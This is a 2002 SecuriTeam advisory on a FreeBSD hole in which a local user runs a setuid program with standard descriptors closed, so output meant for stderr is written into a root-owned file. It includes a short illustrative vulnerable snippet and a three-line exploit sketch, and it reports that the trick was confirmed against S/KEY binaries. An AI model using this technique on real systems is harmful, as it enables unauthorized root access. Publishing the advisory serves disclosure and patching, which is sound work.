|
The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Suid Application Execution May Give Local Root
------------------------------------------------------------------------
SUMMARY
It is possible for a local user under the FreeBSD operating system to
execute a suid application with its stdin, stdout, or stderr closed.
DETAILS
Consider the following (imaginary) suid application:
-- begin of imaginary code snippet
FILE * f = fopen("/etc/root_owned_file", "r+");
if(f) {
fprintf(stderr, "%s: fopen() succeeded\n", argv[0]);
fclose(f);
}
-- end of imaginary code snippet
Now, consider the following (imaginary) exploit:
-- begin of imaginary exploit snippet
while(dup(1) != -1);
close(2);
execl("/path/to/suid_application", "this text will endup in the
root_owned_file", 0);
-- end of imaginary exploit snippet
Exploitation has been confirmed using the S/KEY binaries.
Impact:
High. Local users should be able to gain root privileges.
Solution:
FreeBSD source trees have been updated on the 21th of april 2002. Please
cvsup.
ADDITIONAL INFORMATION
The information has been provided by <mailto:joost@pine.nl> Joost Pol.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages.
|
